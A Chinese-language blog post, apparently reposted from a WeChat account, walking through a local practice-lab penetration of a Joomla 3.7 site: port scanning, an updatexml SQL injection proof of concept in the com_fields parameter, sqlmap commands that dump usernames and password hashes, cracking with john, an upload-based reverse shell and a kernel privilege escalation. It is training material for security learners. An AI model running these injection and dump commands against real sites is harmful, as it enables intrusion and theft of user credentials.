前言
欲善其事,必先利其器。学习好渗透最重要的是就是实践,我们可以通过在本地搭建靶场来作为我们的目标。通过对这些靶场的渗透练习,充分理解每个漏洞的原理。
渗透过程
1、搭建虚拟机我们使用最小安装,安装成功后只有一个登陆界面,虚拟机以NAT方式连接
2、使用namp或者masscan进行简单的端口扫描,发现只开放了80端口
3、访问一下80端口,页面提示我们只有一个flag,需要root提权
4、我们先进行一波信息收集,可以看到这个CMS是joomla的,查看版本为3.7,通过查询我们知道3.7的joomla有sql注入
Poc为:index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)
6、我们使用sqlmap跑一下,跑出来这个库是joomladb
Payload: python sqlmap.py -u"http://192.168.131.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" --dbs --batch
7、继续跑一下数据表
Payload:python sqlmap.py -u"http://192.168.131.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -D joomladb --tables --batch
8、我们看到有个名叫“#_users”的表,去看看列名
payload:python sqlmap.py -u"http://192.168.131.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -D joomladb -T #__users --columns
9、搜索其中发现有username 和password的字段,把数据dump下来
Payload: >python sqlmap.py -u"http://192.168.131.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -D joomladb -T #__users -C username,password --dump
10、我们得到了admin的hash 用kali自带的hash解密工具john,先在kali中创建一个文件把这段hash给复制进去,然后john 文件
11、使用John进行解密,直接解密结果,Admin的密码为snoopy,但是我们还不知道管理员后台,在kali中用dirb跑一下
12、看到有一个administrator,我们直接进行访问
13、登陆进去后在tmp路径下有一个文件上传点
14、进行反弹shell,反弹成功
15、可以看到是一个低权限用户,所以我们考虑提权,查看一下内核版本
16、网上找一下对应的提权exp
17、使用39772进行提权,搜索到URL下载,然后上传到服务器tmp目录下,进行提权
18、提权成功
19、查看flag
团队介绍
点击关注银河护卫队super
原文始发于微信公众号(银河护卫队super):记一次搭建靶场渗透过程(3)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论